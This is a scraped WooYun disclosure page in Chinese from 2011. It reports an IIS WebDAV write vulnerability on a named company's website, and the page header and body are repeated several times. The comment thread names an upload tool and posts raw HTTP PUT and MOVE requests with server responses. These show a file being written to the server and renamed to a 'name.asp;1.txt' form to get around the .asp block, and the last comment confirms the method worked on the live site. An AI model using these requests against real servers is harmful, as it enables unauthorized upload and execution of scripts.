瑞达信息安全产业股份有限公司IIS写入漏洞 | WooYun-2011-02238

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2011-02238

漏洞标题：瑞达信息安全产业股份有限公司IIS写入漏洞

漏洞作者：鬼色[N.S.T]

提交时间： 2011-06-11

公开时间： 2011-06-11

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org

Tags标签： iis iis写权限漏洞利用 iis配置webdav权限控制不当

分享漏洞：腾讯微博 新浪微博 Twitter 网易微博 豆瓣

漏洞详情

披露状态：

2011-06-11：积极联系厂商并且等待厂商认领中，细节不对外公开
2011-06-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

瑞达信息安全产业股份有限公司IIS写入漏洞，webdav

详细说明：

瑞达信息安全产业股份有限公司IIS写入漏洞，测试：http://www.jetsec.com.cn/guise.txt

漏洞证明：

瑞达信息安全产业股份有限公司IIS写入漏洞，测试：http://www.jetsec.com.cn/guise.txt

修复方案：

瑞达信息安全产业股份有限公司IIS写入漏洞，测试：http://www.jetsec.com.cn/guise.txt

ngsst

版权声明：转载请注明来源鬼色[N.S.T]@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：5 (WooYun评价)

顶(1)踩(0)

2011-06-11 19:23 | xsser (核心白帽子 | Rank:236 漏洞数:16 | 卖身不卖艺)

写不成功啊测试了你用的什么方法

回复此人
2011-06-11 20:08 | Joker (白帽子 | Rank:14 漏洞数:1 | 专注打飞机23年，给你这样的右手~kingboxin...)

能写啊，直接用个iiswrite就写上去了:http://www.jetsec.com.cn/test.txt

回复此人
2011-06-11 20:57 | xsser (核心白帽子 | Rank:236 漏洞数:16 | 卖身不卖艺)

求工具

回复此人
2011-06-11 21:48 | Joker (白帽子 | Rank:14 漏洞数:1 | 专注打飞机23年，给你这样的右手~kingboxin...)

直接搜索iiswrite应该就有下载吧，这个东西还是蛮好找的。

回复此人
2011-06-12 00:26 | xsser (核心白帽子 | Rank:236 漏洞数:16 | 卖身不卖艺)

PUT /a.txt HTTP/1.0 Content-Length: 5 aaaaa HTTP/1.1 201 Created Connection: close Date: Sat, 11 Jun 2011 16:07:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://200.200.200.8/a.txt Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK MOVE /a.txt HTTP/1.0 Destination: /c.asp HTTP/1.1 207 Multi-Status Connection: close Date: Sat, 11 Jun 2011 16:24:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://200.200.200.8/c.asp Content-Type: text/xml Content-Length: 178 <?xml version="1.0"?><a:multistatus xmlns:a="DAV:"><a:response><a:href>http://20 0.200.200.8/c.asp</a:href><a:status>HTTP/1.1 403 Forbidden</a:status></a:respons e></a:multistatus>发送 44, r接受 396: 无sock

回复此人
2011-06-12 00:27 | xsser (核心白帽子 | Rank:236 漏洞数:16 | 卖身不卖艺)

MOVE /a.txt HTTP/1.0 Destination: /b.asp;1.txt HTTP/1.1 201 Created Connection: close Date: Sat, 11 Jun 2011 16:23:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: http://200.200.200.8/b.asp;1.txt Content-Type: text/xml Content-Length: 0

回复此人
2011-06-12 00:32 | xsser (核心白帽子 | Rank:236 漏洞数:16 | 卖身不卖艺)

http://www.jetsec.com.cn/d.asp;1.txt 微软是傻逼鉴定完毕！

回复此人

登录后才能发表评论，请先登录。

WooYun.org

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2011-02238

漏洞标题：瑞达信息安全产业股份有限公司IIS写入漏洞

相关厂商：瑞达信息安全产业股份有限公司

漏洞作者：鬼色[N.S.T]

提交时间： 2011-06-11

公开时间： 2011-06-11

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org

Tags标签： iis iis写权限漏洞利用 iis配置webdav权限控制不当

分享漏洞：腾讯微博 新浪微博 Twitter 网易微博 豆瓣

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源鬼色[N.S.T]@乌云

漏洞回应

厂商回应：

顶(1)踩(0)

评论

WooYun.org

漏洞概要 关注数(6) 关注此漏洞

缺陷编号： WooYun-2011-02238

漏洞标题： 瑞达信息安全产业股份有限公司IIS写入漏洞

相关厂商： 瑞达信息安全产业股份有限公司

漏洞作者： 鬼色[N.S.T]

提交时间： 2011-06-11

公开时间： 2011-06-11

漏洞类型： 系统/服务运维配置不当

危害等级： 高

自评Rank： 20

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org

Tags标签： iis iis写权限漏洞利用 iis配置webdav权限控制不当

分享漏洞： 腾讯微博 新浪微博 Twitter 网易微博 豆瓣

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 鬼色[N.S.T]@乌云

漏洞回应

厂商回应：

顶(1)踩(0)

评论

漏洞概要关注数(6) 关注此漏洞

漏洞标题：瑞达信息安全产业股份有限公司IIS写入漏洞

相关厂商：瑞达信息安全产业股份有限公司

漏洞作者：鬼色[N.S.T]

漏洞类型：系统/服务运维配置不当

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

分享漏洞：腾讯微博新浪微博 Twitter 网易微博豆瓣

版权声明：转载请注明来源鬼色[N.S.T]@乌云